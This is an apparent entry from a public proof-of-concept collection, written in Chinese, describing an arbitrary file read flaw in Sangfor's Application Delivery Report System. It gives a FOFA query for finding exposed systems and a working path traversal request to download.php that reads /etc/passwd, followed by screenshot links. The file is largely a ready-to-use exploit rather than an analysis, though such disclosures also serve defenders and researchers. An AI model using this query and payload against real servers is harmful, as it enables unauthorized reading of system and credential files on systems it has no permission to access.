Awesome-POC/Web应用漏洞/深信服 应用交付报表系统 download.php 任意文件读取漏洞.md
2022-05-25 15:32:50 +08:00

31 lines
671 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 深信服 应用交付报表系统 download.php 任意文件读取漏洞
## 漏洞描述
深信服 应用交付报表系统 download.php文件存在任意文件读取漏洞攻击者通过漏洞可以下载服务器任意文件
## 漏洞影响
```
深信服 应用交付报表系统
```
## FOFA
```
app="SANGFOR-应用交付报表系统"
```
## 漏洞复现
登录页面
![image-20220525144847811](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251448956.png)
验证POC
```
/report/download.php?pdf=../../../../../etc/passwd
```
![image-20220525144958637](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251449708.png)